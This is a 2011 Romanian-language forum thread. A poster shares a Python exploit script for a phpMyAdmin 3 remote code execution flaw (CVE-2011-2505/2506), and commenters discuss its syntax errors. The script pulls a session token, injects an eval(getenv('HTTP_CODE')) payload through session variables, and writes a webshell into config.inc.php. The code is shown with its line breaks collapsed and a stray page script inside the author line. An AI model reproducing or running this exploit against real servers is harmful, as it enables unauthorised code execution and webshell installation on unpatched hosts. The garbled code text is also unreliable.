Nytro Posted July 8, 2011 Report Share Posted July 8, 2011 phpMyAdmin3 (pma3) Remote Code Execution Exploit#!/usr/bin/env python# coding=utf-8# pma3 - phpMyAdmin3 remote code execute exploit# Author: wofeiwo<wofeiwo@80sec.com<script type="text/javascript">/* <![CDATA[ */(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();/* ]]> */</script>># Thx Superhei# Tested on: 3.1.1, 3.2.1, 3.4.3# CVE: CVE-2011-2505, CVE-2011-2506# Date: 2011-07-08# Have fun, DO *NOT* USE IT TO DO BAD THING.################################################# Requirements: 1. "config" directory must created&writeable in pma directory.# 2. session.auto_start = 1 in php.ini configuration.import os,sys,urllib2,redef usage(program): print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote codeexecute exploit" print "Usage: %s <PMA_url>" % program print "Example: %s http://www.test.com/phpMyAdmin" % program sys.exit(0)def main(args): try: if len(args) < 2: usage(args[0]) if args[1][-1] == "/": args[1] = args[1][:-1] # ??????????token??sessionid??sessionid??phpMyAdmin???????µ? print "[+] Trying get form token&session_id.." content = urllib2.urlopen(args[1]+"/index.php").read() r1 = re.findall("token=(\w{32})", content) r2 = re.findall("phpMyAdmin=(\w{32,40})", content) if not r1: r1 = re.findall("token\" value=\"(\w{32})\"", content) if not r2: r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content) if len(r1) < 1 or len(r2) < 1: print "[-] Cannot find form token and session id...exit." sys.exit(-1) token = r1[0] sessionid = r2[0] print "[+] Token: %s , SessionID: %s" % (token, sessionid) # ??????????swekey.auth.lib.php????$_SESSION??? print "[+] Trying to insert payload in $_SESSION.." 
uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA" url = args[1]+uri opener = urllib2.build_opener() opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %(sessionid, sessionid))) urllib2.install_opener(opener) urllib2.urlopen(url) # ????setup???shell print "[+] Trying get webshell.." postdata ="phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"% (sessionid, token) url = args[1]+"/setup/config.php" # print "[+]Postdata: %s" % postdata urllib2.urlopen(url, postdata) print "[+] All done, pray for your lucky!" # ??????????????shell url = args[1]+"/config/config.inc.php" opener.addheaders.append(('Code', 'phpinfo();')) urllib2.install_opener(opener) print "[+] Trying connect shell: %s" % url result = re.findall("System \</td\>\<tdclass=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read()) if len(result) == 1: print "[+] Lucky u! System info: %s" % result[0] print "[+] Shellcode is: eval(getenv('HTTP_CODE'));" else: print "[-] Cannot get webshell." except Exception, e: print eif __name__ == "__main__" : main(sys.argv)Nu l-am incercat, pe cine intereseaza sa incerce.Sursa: phpMyAdmin3 (pma3) Remote Code Execution Exploit Quote Link to comment Share on other sites More sharing options...
xaren — Posted July 8, 2011

L-am incercat acum 20 de minute, dar da erori de sintaxa.
Zatarra — Posted July 9, 2011

> L-am incercat acum 20 minute dar da erori de sintaxa

Iti da erori de sintaxa deoarece nu e aranjat bine. Rearanjeaza-l si apoi ruleaza-l. Python e foarte strict cand vine vorba de sintaxa. Imi place la nebunie treaba asta, deoarece doar cei care cunosc codul stiu sa-l foloseasca. Daca bagi 5-10 tab-uri in cod, se pierd toti skizzi.

On: Nytro, stiam de el, am sa-l probez zilele astea.
xaren — Posted July 9, 2011

> Daca bagi 5-10 tab-uri in cod se pierd toti skizzi.

Te referi la mine?